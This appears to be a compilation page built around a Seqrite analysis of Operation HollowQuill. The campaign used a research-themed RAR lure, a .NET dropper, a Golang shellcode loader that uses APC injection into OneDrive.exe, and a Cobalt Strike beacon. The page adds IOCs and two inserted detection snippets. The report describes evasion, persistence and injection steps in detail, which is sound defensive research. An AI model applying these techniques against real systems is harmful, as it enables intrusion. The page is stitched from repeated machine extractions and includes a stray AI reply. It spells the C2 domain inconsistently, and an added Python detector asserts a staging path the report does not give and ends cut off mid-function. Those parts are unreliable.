Operation HollowQuill: Malware delivered into Russian R&D Networks via Research Decoy PDFs.

  • ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
  • Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
  • Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
  • Original: All text extracted from PDF

Original Text

Operation HollowQuill: Malware delivered into Russian R&D Networks via Research Decoy PDFs

Subhajeet Singha

Contents

  • Introduction
  • Key Targets
  • Industries Affected
  • Geographical Focus
  • Infection Chain
  • Initial Findings
  • Looking into the decoy-document
  • Technical Analysis
  • Stage 1 – Malicious RAR File
  • Stage 2 – Malicious .NET malware-dropper
  • Stage 3 – Malicious Golang Shellcode loader
  • Stage 4 – Shellcode Overview
  • Hunting and Infrastructure
  • Conclusion
  • Seqrite Protection
  • IOCs
  • MITRE ATT&CK
  • Authors

Introduction

SEQRITE Labs APT-Team has been tracking and has uncovered a campaign targeting the Baltic State Technical University, a well-known institution for various defense, aerospace, and advanced engineering programs that contribute to Russia’s military-industrial complex. Tracked as Operation HollowQuill, the campaign leverages weaponized decoy documents masquerading as official research invitations to infiltrate academic, governmental, and defense-related networks. The threat entity delivers a malicious RAR file containing a .NET malware dropper, which in turn drops a Golang-based shellcode loader along with a legitimate OneDrive application and a decoy PDF, with a Cobalt Strike payload as the final stage.

Key Targets

Industries Affected

  • Academic & Research Institutions
  • Military & Defense Industry
  • Aerospace & Missile Technology
  • Government-oriented research entities

Geographical Focus

  • Russian Federation

Infection Chain

Initial Findings

In the early months of 2025, our team found a malicious RAR archive file named Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова.rar, which translates to Outgoing 3548 on the formation of state assignments for conducting fundamental and exploratory research at BSTU ‘VOENMEKH’ named after D.F. Ustinov.rar, which had surfaced on VirusTotal. Upon investigation, we determined that this RAR has been used as a preliminary source of infection, containing a malicious .NET dropper which contains multiple other payloads along with a PDF-based decoy.

The RAR archive contains a malicious .NET executable functioning as a dropper, named “Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова”, which also translates to Outgoing No. 3548 regarding the formation of state assignments for conducting fundamental and exploratory research at BSTU ‘VOENMEKH’ named after D.F. Ustinov. This dropper is responsible for deploying a legitimate OneDrive executable alongside a malicious shellcode loader written in Golang. Upon execution, the .NET executable performs several operations: it deploys the Golang loader containing the shellcode, injects the shellcode into the legitimate OneDrive process, and spawns a decoy document. Before delving into the technical details, let’s first examine the decoy document.

Looking into the decoy-document

Upon looking into the decoy document, it turns out that this lure is a document related to the Ministry of Science and Higher Education of Russia, specifically concerning Baltic State Technical University “VOENMEKH” named after D.F. Ustinov. The document appears to be an official communication addressed to multiple organizations, potentially discussing state-assigned research projects or defense-related academic collaborations. The above is a translated version of the initial sections of the decoy.

Now, looking into the later part of the decoy, it can be seen that the decoy document provides additional information on the submission process for state-assigned research tasks, emphasizing that financial support for these projects will come from budgetary allocations through the Ministry of Science and Higher Education of Russia.

The contents and the entire decoy confirm that this PDF serves as a comprehensive guideline for the allocation of state-assigned research tasks, outlining the process for organizations to submit proposals for fundamental and applied research projects under the 2026-2028 budget cycle. It provides instructions for institutions, particularly those engaged in advanced scientific and technological research, on how to register their technological requests within the Unified State Information System for Scientific Research and Technological Projects (ЕГИСУ НИОКТР) before the specified deadline.

Also, the document mentions contact details for inquiries: Bogdan Evgenyevich Melnikov, a senior researcher in the Department of Fundamental and Exploratory Research, with an email address for communication. At the end of this decoy, it can be seen that it has been signed by A.E. Shashurin, who is identified as a Doctor of Technical Sciences (д.т.н.), professor, and acting rector (и.о. ректора) of the institution. Overall, this lure document serves as an official communication from the Ministry of Science and Higher Education of Russia, providing guidelines for organizations regarding state-funded research initiatives.

Technical Analysis

We will divide our analysis into four main sections. First, we will examine the malicious RAR archive. Second, we will delve into the malicious .NET dropper. Third, we will focus on analyzing the working of the malicious Golang-based shellcode injector, and at the end, we will look into the malicious Cobalt Strike payload. This detailed exploration will shed light on the methodologies employed and provide insights into the threat actor’s tactics within this particular campaign.

Stage 1 – Malicious RAR File

Upon examining the malicious RAR file, we found that it contains another malicious executable named Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова. Initial analysis of the file’s artefacts revealed that it is a 32-bit .NET-based executable. In the next section, we will explore the functionality of this .NET executable.

Stage 2 – Malicious .NET malware-dropper

Now, let us look into the workings of the .NET file which was compressed inside the RAR archive. As we found in the previous section, the binary is a 32-bit .NET executable; it was renamed SystemUpdaters.exe when we loaded it into our analysis tools. Upon looking inside the sample, we found three interesting methods. Now let us dive deep into them.

Looking into the first method, we can see that the Main function calls another method, MyCustomApplicationContext. Let us analyze that method.

Next, looking into the method, we found that the code initially checks whether the decoy PDF is present inside the C:\Users\Appdata\Roaming\Documents location. In case the PDF file is not present, it goes ahead and copies the decoy, which is stored under the resources section, and writes it into that location.

Next, looking into the code further, we found that it checks if the file OneDrive.exe, which is the legitimate OneDrive application, exists. In case it does not find it in the desired location, it goes ahead and copies the legitimate application stored under the resource section and writes it into the location.

Looking into the later part of the code, we found that it checks for a file named OneDrives_v2_1.exe under the location C:\Users\Appdata\Roaming\Driver. In case it does not find the file, just as for the similar files, it copies the executable from the resources section and writes it to the location.

Then, one of the most intriguing aspects of this dropper is its use of a shortcut (.lnk) file named X2yL.lnk as a persistence mechanism, placing it in the Windows Startup folder to ensure execution upon system boot. Upon analyzing the H3kT7fXw method, we observed that it is responsible for creating this shortcut file. The method utilizes WshShell to generate the .lnk file and assigns it a Microsoft Office-based icon, making it less suspicious. Additionally, the target path of the shortcut is set to the location where the malicious payload, i.e., OneDrives_v2_1.exe, is stored, ensuring its execution whenever the shortcut is triggered upon booting.

At the end, it goes ahead and spawns the decoy PDF on the screen. As we conclude the analysis of the malicious .NET dropper, in the next sections we will analyze the malicious executable dropped by this dropper.

Stage 3 – Malicious Golang Shellcode loader

Initially, upon looking into the sample inside analysis tools, we can confirm that this executable is programmed using Golang. Next, we will look into the working of the shellcode loader and its injection mechanism.

Looking into the very first part of this shellcode loader, we found that the binary executes the time_now function to initially capture the current system time, then it calls time_sleep, which is also a Golang function, with a hardcoded value, and then it calls the time_now function again, which captures the timestamp after the sleep. Then, it calls time_Time_Sub, which computes the difference between the timestamps captured by the two calls, and checks if the total sleep time is less than 6 seconds. In case the sleep duration is shorter, the program exits; this acts as a little anti-analysis technique.

Next, moving ahead and checking the code, we found that a process of the legitimate OneDrive executable, which was dropped by the .NET dropper, is being created using the CreateProcess API in Golang, and the process is being created in suspended mode.

Then, the shellcode which is already embedded in this loader binary is being read by using the Golang function embed_FS_ReadFile, which returns the shellcode.

Next, the shellcode returned by the previous function, which is in a base64-encoded format, is being decoded using the Golang native function base64.StdEncoding.DecodeString and returned.

Then, the code uses a hardcoded 13-byte key, which is used to decode the entire shellcode.

Then finally, the code performs the APC Injection technique to inject the shellcode into memory: it first starts the process in a suspended state, followed by decoding and decrypting the shellcode, followed by allocating memory in the suspended OneDrive.exe process. Once the memory is allocated, it goes ahead and writes the shellcode into that memory using WriteProcessMemory, then it uses the QueueUserAPC API to queue a function call in the main thread of the suspended OneDrive.exe process. Finally, it uses ResumeThread, which causes the queued APC function (containing the shellcode) to execute, effectively running the injected malicious code within the context of OneDrive.exe. Now, let us analyze some key artifacts of the shellcode.

Stage 4 – Shellcode overview

Upon looking inside the malicious shellcode and analyzing it, we found that the shellcode is actually a loader, which works by initially loading the Windows wwanmm.dll library. Once the DLL is loaded, it zeroes out the .text section of the DLL. It uses the Windows API DllCanUnloadNow, which helps to prepare the beacon in memory, thus further facilitating the working of the shellcode, which is a Cobalt Strike beacon.

Further analyzing it, it becomes quite evident that the beacon is connecting to the C2 server hosted by the attacker using a certain user-agent. As this tool is quite commonly used, we will not delve in depth into the workings of the malicious beacon. The configuration of the beacon can be extracted as follows.

Extracted Configuration:

  • Method : GET
  • Host [Command & Control] : phpsympfony.com
  • User-Agent : “Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko”

Hunting and Infrastructure

Upon analysis of the shellcode injector programmed in Golang, we found little OPSEC-related mistakes from the threat actor, such as leaving the Go build ID in the injector, which helped us to hunt for similar payloads used by the same threat actor. The Go build ID is as follows:

_APqjT14Rci2qCv58VO/QN6emhFauHgKzaZvDVYE/3lVOVKh9ePO_EDoV_lSN/NL58izAdTGRId20sd3CJ

Now, looking into the infrastructural artefacts, the malicious command-and-control server, which has been hosted at the domain phpsymfony[.]com, has been rotating the domain across multiple ASN services. Also, there has been a unique HTTP title which has also been rotated multiple times across the C2 server.

Looking into the response across the history, we can see that the title Coming Soon – pariaturzzphy.makebelievercorp[.]com has been set up multiple times. Upon further searching for the same HTTP title, we found that a lot of hosts are serving the same title, out of which some of them are serving malicious binaries such as AsyncRAT and much more.

Looking into the ASNs, the C2 server has been rotating since the date of activation. The list is as follows.

ASN        Geolocation     Owner
AS13335    United States   Cloudflare Net
AS35916    United States   MULTA-ASN1
AS135377   Hong Kong       UCLOUD-HK-AS-AP UCLOUD INFORMATION TECHNOLOGY HK LIMITED
AS174      United States   COGENT-174
AS47846    Germany         SEDO-AS
AS8560     Unknown         IONOS-AS

Conclusion

We have found that a threat actor is targeting the Baltic Technical University using a research-themed lure, where they have been using a .NET dropper to a shellcode loader, finally delivering a Cobalt Strike in-memory implant. Analyzing the overall campaign and the TTPs employed by the threat actor, we can conclude that the threat actor started targeting a few months back, since December 2024.

SEQRITE Protection

  • Trojan.Ghanarava.1738100518c73fdb
  • Trojan.Ghanarava.1735165667615275

IOCs

MD5                                 Filename
ab310ddf9267ed5d613bcc0e52c71a08    Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова.rar
fad1ddfb40a8786c1dd2b50dc9615275    SystemsUpdaters.exe
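The Stage 2 persistence artefact (a Startup-folder .lnk whose target is OneDrives_v2_1.exe under ...\AppData\Roaming\Driver) is something a defender can check for directly. The Go program below is an added example, not code from the write-up or from Seqrite: it parses the LocalBasePath out of a Shell Link file and flags targets that match the dropper's staging location. The in-memory sample .lnk, the username `victim` and the helper names are constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"os"
	"strings"
)

// Layout constants from the Shell Link (.lnk) binary file format.
const (
	lnkHeaderSize           = 0x4C // fixed ShellLinkHeader size
	flagHasLinkTargetIDList = 0x1  // LinkFlags bit 0
	flagHasLinkInfo         = 0x2  // LinkFlags bit 1
	linkInfoHasLocalPath    = 0x1  // LinkInfoFlags bit 0: VolumeIDAndLocalBasePath
)

var errTruncated = errors.New("truncated .lnk data")

// ShellLinkTarget returns the ANSI LocalBasePath of a .lnk file, i.e. the
// program the shortcut launches. It walks header -> optional IDList ->
// LinkInfo, which is enough for shortcuts written through WshShell.
func ShellLinkTarget(data []byte) (string, error) {
	if len(data) < lnkHeaderSize || binary.LittleEndian.Uint32(data[0:4]) != lnkHeaderSize {
		return "", errors.New("not a shell link header")
	}
	flags := binary.LittleEndian.Uint32(data[0x14:0x18])
	pos := lnkHeaderSize
	if flags&flagHasLinkTargetIDList != 0 {
		if len(data) < pos+2 {
			return "", errTruncated
		}
		pos += 2 + int(binary.LittleEndian.Uint16(data[pos:pos+2])) // skip IDList
	}
	if flags&flagHasLinkInfo == 0 {
		return "", errors.New("shortcut has no LinkInfo section")
	}
	if len(data) < pos+0x1C {
		return "", errTruncated
	}
	li := data[pos:]
	size := int(binary.LittleEndian.Uint32(li[0:4]))
	if size < 0x1C || size > len(li) {
		return "", errTruncated
	}
	li = li[:size]
	if binary.LittleEndian.Uint32(li[8:12])&linkInfoHasLocalPath == 0 {
		return "", errors.New("LinkInfo carries no local base path")
	}
	off := int(binary.LittleEndian.Uint32(li[16:20])) // LocalBasePathOffset
	if off >= size {
		return "", errTruncated
	}
	end := bytes.IndexByte(li[off:], 0)
	if end < 0 {
		end = size - off
	}
	return string(li[off : off+end]), nil
}

// IsHollowQuillPersistence flags a shortcut target matching the dropper's
// behaviour: OneDrives_v2_1.exe, or anything staged under ...\AppData\Roaming\Driver.
func IsHollowQuillPersistence(target string) bool {
	t := strings.ToLower(strings.ReplaceAll(target, "/", `\`))
	base := t[strings.LastIndex(t, `\`)+1:]
	return base == "onedrives_v2_1.exe" || strings.Contains(t, `\appdata\roaming\driver\`)
}

// buildSampleLnk constructs a minimal Shell Link in memory (header plus a
// LinkInfo holding only a LocalBasePath) so the example runs without a disk file.
func buildSampleLnk(target string) []byte {
	hdr := make([]byte, lnkHeaderSize)
	binary.LittleEndian.PutUint32(hdr[0:4], lnkHeaderSize)
	// LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order.
	copy(hdr[4:20], []byte{0x01, 0x14, 0x02, 0, 0, 0, 0, 0, 0xC0, 0, 0, 0, 0, 0, 0, 0x46})
	binary.LittleEndian.PutUint32(hdr[0x14:0x18], flagHasLinkInfo)
	path := append([]byte(target), 0) // NUL-terminated ANSI string
	li := make([]byte, 0x1C, 0x1C+len(path))
	binary.LittleEndian.PutUint32(li[0:4], uint32(0x1C+len(path))) // LinkInfoSize
	binary.LittleEndian.PutUint32(li[4:8], 0x1C)                   // LinkInfoHeaderSize
	binary.LittleEndian.PutUint32(li[8:12], linkInfoHasLocalPath)  // LinkInfoFlags
	binary.LittleEndian.PutUint32(li[16:20], 0x1C)                 // LocalBasePathOffset
	return append(hdr, append(li, path...)...)
}

func main() {
	// Without arguments the constructed sample is scanned; each argument is
	// otherwise read as a .lnk file (e.g. the contents of a Startup folder).
	inputs := map[string][]byte{"X2yL.lnk (constructed)": buildSampleLnk(
		`C:\Users\victim\AppData\Roaming\Driver\OneDrives_v2_1.exe`)}
	for _, p := range os.Args[1:] {
		if data, err := os.ReadFile(p); err == nil {
			inputs[p] = data
		}
	}
	for name, data := range inputs {
		target, err := ShellLinkTarget(data)
		if err != nil {
			fmt.Printf("%s: %v\n", name, err)
			continue
		}
		fmt.Printf("%s -> %s suspicious=%v\n", name, target, IsHollowQuillPersistence(target))
	}
}
```

A Unicode-only shortcut (LocalBasePathOffsetUnicode without an ANSI path) is reported as an error rather than silently passed, so such files still surface for manual review.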

Original Text ChatGPT 4o Paged

advanced engineering programs that contribute to Russia’s military-industrial complex. Tracked as Operation HollowQuill, the campaign leverages weaponized decoy documents masquerading as official research invitations to infiltrate academic, governmental, and defense-related networks. The threat entity delivers a malicious RAR file containing a .NET malware dropper, which in turn drops a Golang-based shellcode loader along with a legitimate OneDrive application and a decoy PDF, with a Cobalt Strike payload as the final stage.

Key Targets

Industries Affected

  • Academic & Research Institutions
  • Military & Defense Industry
  • Aerospace & Missile Technology
  • Government-oriented research entities

Geographical Focus

  • Russian Federation

Infection Chain

Initial Findings

In the early months of 2025, our team found a malicious RAR archive file named Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова.rar, which translates to Outgoing 3548

Phase: Initial Access

  • Technique: Spear Phishing with Malicious Document
  • Procedure: The attacker sends a malicious RAR archive containing a decoy document and .NET malware dropper disguised as an official research invitation.

Phase: Execution

  • Technique: .NET Malware Execution
  • Procedure: The .NET dropper is executed, initiating further payload deployment.

Phase: Payload Deployment

  • Technique: Shellcode Loader Deployment
  • Procedure: The .NET dropper installs a Golang-based shellcode loader.

Phase: Execution

  • Technique: Legitimate Application Abuse
  • Procedure: The loader deploys a legitimate OneDrive application along with the payload.

Phase: Defense Evasion

  • Technique: Decoy Document Presentation
  • Procedure: A decoy PDF document is presented to the user to disguise malicious activities.

Phase: Command and Control

  • Technique: Cobalt Strike Usage
  • Procedure: The final payload includes Cobalt Strike, allowing for remote command execution and control over the compromised systems.

Operation HollowQuill: Malware delivered into Russian R&D Networks via Research Decoy PDFs

Subhajeet Singha

Contents

  • Introduction
  • Key Targets
  • Industries Affected
  • Geographical Focus
  • Infection Chain
  • Initial Findings
  • Looking into the decoy-document
  • Technical Analysis
  • Stage 1 – Malicious RAR File
  • Stage 2 – Malicious .NET malware-dropper
  • Stage 3 – Malicious Golang Shellcode loader
  • Stage 4 – Shellcode Overview
  • Hunting and Infrastructure
  • Conclusion
  • Seqrite Protection
  • IOCs
  • MITRE ATT&CK
  • Authors

Introduction

SEQRITE Labs APT-Team has been tracking and has uncovered a campaign targeting the Baltic State Technical University, a well-known institution for various defense, aerospace, and

Phase: Initial Access

  • Technique: Spear Phishing with Malicious Attachment
  • Procedure: The attacker sends emails containing decoy PDF documents designed to lure targets into opening them. These PDFs are bundled within a malicious RAR file.

Phase: Execution

  • Technique: User Execution of Compressed File
  • Procedure: Users are tricked into extracting and executing contents from the RAR archive.

Phase: Execution

  • Technique: .NET Malware Execution
  • Program: Malicious .NET malware-dropper is executed, which starts the infection chain by deploying additional payloads.

Phase: Defense Evasion

  • Technique: Obfuscated Files or Information
  • Program: Golang Shellcode loader is used to obscure and execute embedded shellcode undetected.

Phase: Execution

  • Technique: In-Memory Execution of Shellcode
  • Procedure: The Golang shellcode loader executes the shellcode directly in memory to avoid detection by endpoint security.

Phase: Command and Control

  • Technique: Encrypted Channel
  • Procedure: The shellcode establishes an encrypted communication channel with the attacker’s infrastructure, enabling ongoing command and control.

on the formation of state assignments for conducting fundamental and exploratory research at BSTU ‘VOENMEKH’ named after D.F. Ustinov.rar, which had surfaced on VirusTotal. Upon investigation, we determined that this RAR has been used as a preliminary source of infection, containing a malicious .NET dropper which contains multiple other payloads along with a PDF-based decoy.

The RAR archive contains a malicious .NET executable functioning as a dropper, named “Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова”, which also translates to Outgoing No. 3548 regarding the formation of state assignments for conducting fundamental and exploratory research at BSTU ‘VOENMEKH’ named after D.F. Ustinov. This dropper is responsible for deploying a legitimate OneDrive executable alongside a malicious shellcode loader written in Golang. Upon execution, the .NET executable performs several operations: it deploys the Golang loader containing the shellcode, injects the shellcode into the legitimate OneDrive process, and spawns a decoy document. Before delving into the technical details, let’s first examine the decoy document.

Looking into the decoy-document

Upon looking into the decoy document, it turns out that this lure is a document related to the Ministry of Science and Higher Education of Russia, specifically concerning Baltic State Technical University “VOENMEKH” named after D.F. Ustinov. The document appears to be an official communication addressed to multiple organizations, potentially discussing state-assigned research projects or defense-related academic collaborations. The above is a translated version of the initial sections of the decoy.

Phase: Initial Access

  • Technique: Spear Phishing with Malicious Archive
  • Procedure: The attacker distributes a RAR archive named “Исх 3548” containing a malicious .NET dropper and a decoy document. The decoy appears to be an official communication from the Ministry of Science and Higher Education of Russia.

Phase: Execution

  • Technique: .NET Dropper Execution
  • Procedure: Upon execution, the .NET executable deploys further payloads and displays a decoy document.

Phase: Defense Evasion

  • Technique: Process Injection
  • Procedure: The .NET dropper injects malicious shellcode into a legitimate OneDrive executable using a Golang-based shellcode loader.

Phase: Execution (Secondary)

  • Technique: Shellcode Execution
  • Procedure: The Golang loader runs the injected shellcode within the context of the OneDrive process.

Now, looking into the later part of the decoy, it can be seen that the decoy document provides additional information on the submission process for state-assigned research tasks, emphasizing that financial support for these projects will come from budgetary allocations through the Ministry of Science and Higher Education of Russia. Also, the document mentions contact details for inquiries: Bogdan Evgenyevich Melnikov, a senior researcher in the Department of Fundamental and Exploratory Research, with an email address for communication.

At the end of this decoy, it can be seen that it has been signed by A.E. Shashurin, who is identified as a Doctor of Technical Sciences (д.т.н.), professor, and acting rector (и.о. ректора) of the institution. Overall, this lure document serves as an official communication from the Ministry of Science and Higher Education of Russia, providing guidelines for organizations regarding state-funded research initiatives.

Technical Analysis

We will divide our analysis into four main sections. First, we will examine the malicious RAR archive. Second, we will delve into the malicious .NET dropper. Third, we will focus on analyzing the working of the malicious Golang-based shellcode injector, and at the end, we will look into the malicious Cobalt Strike payload. This detailed exploration will shed light on the methodologies employed and provide insights into the threat actor’s tactics within this particular campaign.

Stage 1 – Malicious RAR File

Upon examining the malicious RAR file, we found that it contains another malicious executable named Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова. Initial analysis of the file’s artefacts revealed that it is a 32-bit .NET-based executable. In the next section, we will explore the functionality of this .NET executable.

Phase: Initial Access

  • Technique: Malicious Archive via Phishing
  • Procedure: Delivery of a malicious RAR file containing a .NET-based executable named with Russian text.

Phase: Execution

  • Technique: User Execution
  • Procedure: The user is enticed to open a malicious .NET executable from the RAR archive titled in Russian, representing official communication.

Phase: Delivery

  • Technique: .NET Dropper Deployment
  • Procedure: The .NET dropper is executed, deploying further payloads or malicious actions.

Phase: Execution

  • Technique: Shellcode Injection (Golang-based Injector)
  • Procedure: A Golang-based tool is used to inject shellcode into a target process, facilitating further exploitation or execution.

Phase: Command and Control

  • Technique: Cobalt Strike Usage
  • Procedure: The dropper further deploys a Cobalt Strike payload for command and control operations, enabling remote access and control by the threat actor.

This structured breakdown highlights the stages of the campaign and the tools and techniques used, aiding in red team emulation.

The contents and the entire decoy confirm that this PDF serves as a comprehensive guideline for the allocation of state-assigned research tasks, outlining the process for organizations to submit proposals for fundamental and applied research projects under the 2026-2028 budget cycle. It provides instructions for institutions, particularly those engaged in advanced scientific and technological research, on how to register their technological requests within the Unified State Information System for Scientific Research and Technological Projects (ЕГИСУ НИОКТР) before the specified deadline.

The text provided doesn't contain information relevant to threat actor procedures, commands, or tools. If you have a specific Cyber Threat Intelligence (CTI) report or similar data, please share it to extract and structure the procedures used by the threat actor.

Stage 2 – Malicious .NET malware-dropper

Now, let us look into the workings of the .NET file which was compressed inside the RAR archive. As we found in the previous section, the binary is a 32-bit .NET executable; it was renamed SystemUpdaters.exe when we loaded it into our analysis tools. Upon looking inside the sample, we found three interesting methods. Now let us dive deep into them.

Looking into the first method, we can see that the Main function calls another method, MyCustomApplicationContext. Let us analyze that method.

Next, looking into the method, we found that the code initially checks whether the decoy PDF is present inside the C:\Users\Appdata\Roaming\Documents location. In case the PDF file is not present, it goes ahead and copies the decoy, which is stored under the resources section, and writes it into that location.

Phase: Execution

  • Technique: Execution via .NET Malware Dropper
  • Executed Program: SystemUpdaters.exe
  • Procedure: The .NET executable, renamed as SystemUpdaters.exe, serves as a malware dropper. The Main function calls MyCustomApplicationContext.

Phase: Defense Evasion

  • Technique: Hiding Malicious Activity
  • Procedure: The malware checks for the presence of a decoy PDF in C:\Users\Appdata\Roaming\Documents. If absent, it copies the decoy from the resources section to this location, likely to avoid detection and maintain a legitimate appearance.

Then, one of the most intriguing aspects of this dropper is its use of a shortcut (.lnk) file named X2yL.lnk as a persistence mechanism, placing it in the Windows Startup folder to ensure execution upon system boot. Upon analyzing the H3kT7fXw method, we observed that it is responsible for creating this shortcut file. The method utilizes WshShell to generate the .lnk file and assigns it a Microsoft Office-based icon, making it less suspicious. Additionally, the target path of the shortcut is set to the location where the malicious payload, i.e., OneDrives_v2_1.exe, is stored, ensuring its execution whenever the shortcut is triggered upon booting.

At the end, it goes ahead and spawns the decoy PDF on the screen. As we conclude the analysis of the malicious .NET dropper, in the next sections we will analyze the malicious executable dropped by this dropper.

Stage 3 – Malicious Golang Shellcode loader

Phase: Persistence

  • Technique: Shortcut (.lnk) File in Startup Folder
  • Procedure: The threat actor creates a shortcut file named X2yL.lnk using WshShell. The .lnk file is placed in the Windows Startup folder and linked to the malicious payload OneDrives_v2_1.exe. The icon is set to a Microsoft Office-based icon to reduce suspicion.

Phase: Execution

  • Technique: Execution via Startup Folder
  • Procedure: Upon system boot, the shortcut .lnk file is triggered, executing the payload OneDrives_v2_1.exe.

Phase: Deception

  • Technique: Decoy Document Display
  • Procedure: After executing the payload, a decoy PDF is displayed on the screen to distract the user.

Phase: Execution (Golang Shellcode Loader)

  • Technique: Shellcode Execution
  • Procedure: The .NET dropper eventually leads to the execution of a Golang-based shellcode loader. Details on the specific command lines or execution parameters are not provided, but its role is to load and execute malicious shellcode.

Next, looking into the code further, we found that it checks if the file OneDrive.exe, which is the legitimate OneDrive application, exists. In case it does not find it in the desired location, it goes ahead and copies the legitimate application stored under the resource section and writes it into the location.

Looking into the later part of the code, we found that it checks for a file named OneDrives_v2_1.exe under the location C:\Users\Appdata\Roaming\Driver. In case it does not find the file, just as for the similar files, it copies the executable from the resources section and writes it to the location.

Phase: Execution

  • Technique: Sideloading Legitimate Application
  • Procedure: The code checks if OneDrive.exe exists in its expected location. If not, it copies the legitimate application from a resource section to that location.

Phase: Persistence

  • Technique: File Creation
  • Procedure: Checks for the presence of OneDrives_v2_1.exe in C:\Users\Appdata\Roaming\Driver. If the file is missing, it copies the executable from the resources section to the designated location.

Initially, upon looking into the sample inside analysis tools, we can confirm that this executable is programmed using Golang. Next, we will look into the working of the shellcode loader and its injection mechanism.

Looking into the very first part of this shellcode loader, we found that the binary executes the time_now function to initially capture the current system time, then it calls time_sleep, which is also a Golang function, with a hardcoded value, and then it calls the time_now function again, which captures the timestamp after the sleep. Then, it calls time_Time_Sub, which computes the difference between the timestamps captured by the two calls, and checks if the total sleep time is less than 6 seconds. In case the sleep duration is shorter, the program exits; this acts as a little anti-analysis technique.

Phase: Analysis Evasion

  • Technique: Anti-Debugging with Timing Check
  • Procedure: The attacker’s shellcode loader uses Golang functions to measure sleep time as an anti-analysis technique:
    1. Executes time_now to capture the current system time.
    2. Calls time_sleep with a hardcoded duration.
    3. Calls time_now again to check the timestamp post-sleep.
    4. Uses time_Time_Sub to calculate the time difference.
    5. If the sleep duration is less than 6 seconds, the program exits.

This sequence ensures that if the environment is being debugged and the sleep is artificially shortened, the program will terminate.

Then finally, the code performs the APC Injection technique to inject the shellcode into memory: it first starts the process in a suspended state, followed by decoding and decrypting the shellcode, followed by allocating memory in the suspended OneDrive.exe process. Once the memory is allocated, it goes ahead and writes the shellcode into that memory using WriteProcessMemory, then it uses the QueueUserAPC API to queue a function call in the main thread of the suspended OneDrive.exe process. Finally, it uses ResumeThread, which causes the queued APC function (containing the shellcode) to execute, effectively running the injected malicious code within the context of OneDrive.exe. Now, let us analyze some key artifacts of the shellcode.

Stage 4 – Shellcode overview

Upon looking inside the malicious shellcode and analyzing it, we found that the shellcode is actually a loader, which works by initially loading the Windows wwanmm.dll library. Once the DLL is loaded, it zeroes out the .text section of the DLL. It uses the Windows API DllCanUnloadNow, which helps to prepare the beacon in memory, thus further facilitating the working of the shellcode, which is a Cobalt Strike beacon.

Phase: Execution

  • Technique: Process Injection (APC Injection)
  • Procedure:
    1. Start Process in Suspended State: Launch OneDrive.exe in a suspended state.
    2. Decode and Decrypt Shellcode: Prepare the shellcode for injection by decoding and decrypting it.
    3. Allocate Memory: Allocate memory in the OneDrive.exe process.
    4. Write Shellcode into Memory: Use WriteProcessMemory to write the shellcode into the allocated memory.
    5. Queue APC: Use QueueUserAPC API to queue a function call in the main thread of the suspended OneDrive.exe process.
    6. Resume Thread: Use ResumeThread to execute the queued APC function, running the injected shellcode within the OneDrive.exe context.

Phase: Execution

  • Technique: DLL Manipulation
  • Procedure:
    1. Load DLL: Load wwanmm.dll.
    2. Zero Out .text Section: Zero out the .text section of the DLL.
    3. Prepare Beacon: Use DllCanUnloadNow API to prepare the Cobalt Strike beacon in memory.

Next, moving ahead and checking the code, we found that the legitimate OneDrive executable, which was dropped by the .NET dropper, is launched as a process using the CreateProcess API in Golang, and the process is created in suspended mode. Then the shellcode, which is already embedded in this loader binary, is read using the Golang function embed_FS_ReadFile, which returns the shellcode. Next, the shellcode returned by the previous function, which is base64 encoded, is decoded using the Golang native function base64.StdEncoding.DecodeString and returned. Then the code uses a hardcoded 13-byte key to decode the entire shellcode.

Phase: Execution

  • Technique: Process Injection via Suspended Process
  • Procedure:
    1. CreateProcess API Usage: The legitimate OneDrive executable is launched in suspended mode using the CreateProcess API.
    2. Shellcode Retrieval: Utilizes Golang's embed_FS_ReadFile function to read the embedded shellcode.
    3. Shellcode Decoding: Decodes the base64 encoded shellcode using Golang's base64.StdEncoding.DecodeString.
    4. Shellcode Decryption: Decodes the shellcode using a hardcoded 13-byte key to execute within the suspended process.

Phase: Defense Evasion

  • Technique: Use of Legitimate Binary for Execution
  • Procedure: Execution of payload through a legitimate binary (OneDrive executable) to bypass security detections.
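The loader-to-OneDrive.exe process chain described above is something a defender can look for in process-creation telemetry. The following is an added detection example, not code from the Seqrite report; the event fields loosely mirror Sysmon Event ID 1, the sample events are constructed, and the list of legitimate OneDrive install directories is an assumption used only to reduce false positives.

```python
from dataclasses import dataclass

# Paths taken from the report: the dropper stages a legitimate OneDrive.exe in
# C:\Users\Public and the Golang loader (OneDrives_v2_1.exe) under
# %AppData%\Roaming\Driver; the loader spawns OneDrive.exe suspended and injects into it.
STAGED_ONEDRIVE = "c:\\users\\public\\onedrive.exe"
LOADER_DIR = "\\appdata\\roaming\\driver\\"
# Assumed directories a genuine OneDrive.exe normally runs from (not from the report).
LEGIT_ONEDRIVE_DIRS = (
    "\\microsoft\\onedrive\\",
    "\\program files\\microsoft onedrive\\",
    "\\program files (x86)\\microsoft onedrive\\",
)

@dataclass
class ProcEvent:          # constructed stand-in for a process-creation event
    image: str            # full path of the created process
    parent_image: str     # full path of the parent process

def classify(ev: ProcEvent) -> list:
    """Return the names of the detection rules this event triggers."""
    image, parent = ev.image.lower(), ev.parent_image.lower()
    name = image.rsplit("\\", 1)[-1]
    hits = []
    if name == "onedrive.exe" and not any(d in image for d in LEGIT_ONEDRIVE_DIRS):
        hits.append("onedrive_outside_install_dir")        # staged copy, e.g. C:\Users\Public
    if LOADER_DIR in parent:
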